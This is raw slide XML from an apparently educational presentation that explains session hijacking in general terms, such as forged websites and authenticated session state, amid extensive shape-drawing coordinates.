            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3645534" h="2554604">
                <a:moveTo>
                  <a:pt x="3219704" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="425703" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379324" y="2498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334390" y="9820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291161" y="21705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249897" y="37895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210857" y="58128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174302" y="82145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140492" y="109687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109687" y="140492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82145" y="174302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58128" y="210857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37895" y="249897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21705" y="291161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9820" y="334390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2498" y="379324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="425703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2128519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2498" y="2174899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9820" y="2219833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21705" y="2263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37895" y="2304326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58128" y="2343366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82145" y="2379921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109687" y="2413731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140492" y="2444536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174302" y="2472078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210857" y="2496095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249897" y="2516328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291161" y="2532518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334390" y="2544403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379324" y="2551725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425703" y="2554224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219704" y="2554224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3266083" y="2551725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311017" y="2544403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3354246" y="2532518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3395510" y="2516328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3434550" y="2496095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3471105" y="2472078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3504915" y="2444536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3535720" y="2413731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3563262" y="2379921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587279" y="2343366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3607512" y="2304326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623702" y="2263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3635587" y="2219833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3642909" y="2174899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3645407" y="2128519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3645407" y="425703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3642909" y="379324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3635587" y="334390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623702" y="291161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3607512" y="249897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587279" y="210857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3563262" y="174302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3535720" y="140492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3504915" y="109687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3471105" y="82145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3434550" y="58128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3395510" y="37895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3354246" y="21705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311017" y="9820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3266083" y="2498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219704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012685" y="4025925"/>
            <a:ext cx="3029585" cy="1173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4445">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Hackers </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>hijack </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040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2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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>create </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ged</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>website.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82723" y="1783231"/>
            <a:ext cx="11689080" cy="81788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80"/>
              </a:spcBef>
            </a:pP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Session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Hijacking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one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approaches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used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exploiting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web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session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vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="6350">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef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functions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following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way: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608307" y="3381755"/>
            <a:ext cx="3645535" cy="2554605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3645534" h="2554604">
                <a:moveTo>
                  <a:pt x="3219704" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="425703" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379324" y="2498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334390" y="9820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291161" y="21705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249897" y="37895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210857" y="58128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174302" y="82145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140492" y="109687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109687" y="140492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82145" y="174302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58128" y="210857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37895" y="249897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21705" y="291161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9820" y="334390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2498" y="379324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="425704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2128520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2498" y="2174899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9820" y="2219833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21705" y="2263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37895" y="2304326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58128" y="2343366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82145" y="2379921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109687" y="2413731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140492" y="2444536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174302" y="2472078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210857" y="2496095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249897" y="2516328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291161" y="2532518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334390" y="2544403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379324" y="2551725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425703" y="2554224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219704" y="2554224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3266083" y="2551725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311017" y="2544403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3354246" y="2532518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3395510" y="2516328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3434550" y="2496095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3471105" y="2472078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3504915" y="2444536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3535720" y="2413731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3563262" y="2379921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587279" y="2343366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3607512" y="2304326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623702" y="2263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3635587" y="2219833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3642909" y="2174899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3645407" y="2128520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3645407" y="425704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3642909" y="379324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3635587" y="334390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623702" y="291161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3607512" y="249897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587279" y="210857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3563262" y="174302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3535720" y="140492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3504915" y="109687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3471105" y="82145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3434550" y="58128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3395510" y="37895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3354246" y="21705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311017" y="9820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3266083" y="2498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219704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1943333" y="3841902"/>
            <a:ext cx="2974975" cy="15563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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>When</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>reloads </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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2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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>bro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35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5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5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160">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>be  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105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7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95">
                <a:solidFill>
                  <a:srgbClr val="404040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105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25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20">
                <a:solidFill>
                  <a:srgbClr val="404040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0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50">
                <a:solidFill>
                  <a:srgbClr val="404040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12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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2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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ged  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>automatically.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855208" y="4422647"/>
            <a:ext cx="447040" cy="471170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="447039" h="471170">
                <a:moveTo>
                  <a:pt x="223265" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="223265" y="117728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="117728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="353187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265" y="353187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265" y="470915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="235457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265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756392" y="4422647"/>
            <a:ext cx="447040" cy="471170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="447040" h="471170">
                <a:moveTo>
                  <a:pt x="223265" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="223265" y="117728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="117728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="353187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265" y="353187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265" y="470915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446531" y="235457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265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" name="object 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2231517" y="6513576"/>
            <a:ext cx="12155170" cy="1321435"/>
            <a:chOff x="2231517" y="6513576"/>
            <a:chExt cx="12155170" cy="1321435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2241042" y="6802374"/>
              <a:ext cx="12136120" cy="1022985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12136119" h="1022984">
                  <a:moveTo>
                    <a:pt x="0" y="170433"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6089" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11965177" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12010478" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12051189" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12085685" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12112338" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12129522" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12135612" y="170433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12135612" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12129522" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12112338" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12085685" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12051189" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12010478" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11965177" y="1022604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170433" y="1022604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6089" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170433"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="57AEF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551176" y="6513576"/>
              <a:ext cx="574675" cy="574675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="574675" h="574675">
                  <a:moveTo>
                    <a:pt x="287274" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="240684" y="3760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196486" y="14648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155270" y="32071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117628" y="55437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84153" y="84153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55437" y="117628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32071" y="155270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14648" y="196486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3760" y="240684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="287274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3760" y="333863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14648" y="378061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32071" y="419277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55437" y="456919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84153" y="490394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117628" y="519110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155270" y="542476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196486" y="559899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240684" y="570787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287274" y="574548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333863" y="570787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378061" y="559899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419277" y="542476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456919" y="519110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490394" y="490394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519110" y="456919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542476" y="419277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559899" y="378061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570787" y="333863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574548" y="287274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570787" y="240684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559899" y="196486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542476" y="155270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519110" y="117628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490394" y="84153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456919" y="55437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419277" y="32071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378061" y="14648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333863" y="3760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287274" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="44AAF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6812" y="6585204"/>
              <a:ext cx="303275" cy="43129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219957" y="7130033"/>
            <a:ext cx="1126871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3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4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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>keeps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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4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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040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1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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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404040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14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4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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
